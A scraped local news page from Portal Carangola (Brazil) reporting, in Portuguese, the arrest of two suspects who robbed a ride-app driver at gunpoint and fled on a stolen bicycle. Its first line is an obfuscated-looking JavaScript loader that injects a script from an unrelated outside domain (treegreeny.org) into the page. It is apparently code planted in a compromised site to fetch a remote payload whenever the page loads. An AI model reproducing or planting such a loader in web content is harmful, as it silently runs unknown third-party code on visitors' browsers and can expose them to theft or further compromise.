;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Suspeitos de assaltar motorista de aplicativo são presos pela Polícia Militar. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Suspeitos de assaltar motorista de aplicativo são presos pela Polícia Militar.

    Um homem de 22 anos foi preso e um adolescente de 17 anos apreendido em Carangola, suspeitos de roubarem um motorista de transporte de aplicativo em Carangola.

De acordo com informações da PM, os dois indivíduos solicitaram uma corrida pelo whatshapp do motorista e durante o trajeto, o homem, apontando um revólver para o motorista, anunciou o assalto.

Foram roubados do motorista, cerca de R$987,00 em dinheiro e a chave do carro. Os autores, após o roubo ainda ameaçaram a vítima, alegando que se ele acionasse a polícia iria ficar ruim a situação pra ele. Em seguida, jogaram um objeto no chão e fugiram em uma bicicleta que encontraram abandonada às margens de uma rua. Durante a fuga abandonaram a bicicleta e continuaram fugindo correndo a pé rumo a um matagal.

Devido ao fato de um dos suspeitos ser natural e morador de Porciúncula, os policiais de Carangola que estavam atuando na ocorrência, solicitaram auxílio dos militares de Porciúncula, os quais conseguiram prender o homem e apreender o menor na cidade de Porciúncula, onde os autores foram apresentados na Delegacia de Polícia.

Após pesquisa no sistema informatizado da PM, os militares constataram que a bicicleta utilizada na fuga havia sido furtada em Carangola em 12 de março deste ano. A bicicleta foi recuperada e será devolvida ao proprietário.

Informação: O Campeão

 

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.